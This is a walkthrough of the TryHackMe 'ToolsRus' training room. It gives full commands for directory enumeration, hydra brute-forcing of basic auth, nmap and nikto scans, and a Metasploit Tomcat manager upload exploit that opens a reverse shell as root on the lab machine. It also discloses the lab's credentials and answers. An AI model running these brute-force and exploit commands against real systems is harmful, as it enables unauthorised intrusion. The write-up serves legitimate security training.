This is the write up for the room ToolsRus on Tryhackme and it is part of the Web Fundamentals Path
Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment
TASKS ToolsRus
Task 1
Start up the machine attached to this room.
1.1 What directory can you find, that begins with a “g”?
We can use dirbuster to enumerate . Open up a terminal and type in the following command dirbuster$
Fill the information as seen in the below screenshot. But do change the IP of the target.
Press start
I always like to see the tree view. The scan is still running but we can see the answer of this question
Answer: guidelines
1.2 Whose name can you find from this directory?
Navigate to this directory with firfox gives us the name
1.3 What directory has basic authentication?
Scan is still running but we can see an other directory called protected
Answer: protected
1.4 What is bob’s password to the protected part of the website?
We know the username is bob but we do now know his password.
First we do an intercept with burp. we use username bob and password password1234
We see the authentication is base 64
options for hydra:
Type in the command
hydra -l bob -P /usr/share/wordlists/rockyou.txt -f 10.10.84.151 http-get /protected
-f is to stop when password is found. It is basic authentication with http-get for the directory protected
Here is a nice guide to help you further with hydra and basic authentication
Defeating HTTP Basic Auth with Hydra – Code Zen (tylerrockwell.github.io)
1.5 What other port that serves a webs service is open on the machine?
Type in the following command to find all open ports with services
nmap -sC -sV -T4 <MACHINE_IP>
Answer: 1234
1.6 Going to the service running on that port, what is the name and version of the software? Answer format: Full_name_of_service/Version
We do not need to surf to the site. It is in our nmap scan
Answer: Apache Tomcat/7.0.88
1.7 Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above. How many documentation files did Nikto identify?
Options for Nikto
Use the following command with nikto. ( do change the password )
nikto -host 10.10.84.151 -root /manager/html -port 1234 -id bob:PASSWORDYOUHAVEFOUND
Answer: 5
1.8 What is the server version (run the scan against port 80)?
This is also in the nmap scan we did in 1,4
Answer: apache/2.4.18
1.9 What version of Apache-Coyote is this service using?
This is also in the nmap scan we did in 1,4
Answer: 1.1
1.10 Use Metasploit to exploit the service and get a shell on the system. What user did you get a shell as?
We know it is apache-coyote 1,1 if we do a bit of research on google we come across this one
Apache Tomcat Manager Authenticated Upload Code Execution (rapid7.com)
Open the msfconsole in a terminal
Now we can get and confige the exploit in metasploit by typing in the following
use exploit/multi/http/tomcat_mgr_upload set target 0 set httppassword bubbles set httpusername bob set rhost 10.10.84.151 set rport 1234 set lhost tun0 run
Type in shell to get the shell and then type in whoami
Answer: root
1.11 What text is in the file /root/flag.txt
Type in cat /root/flag.txt
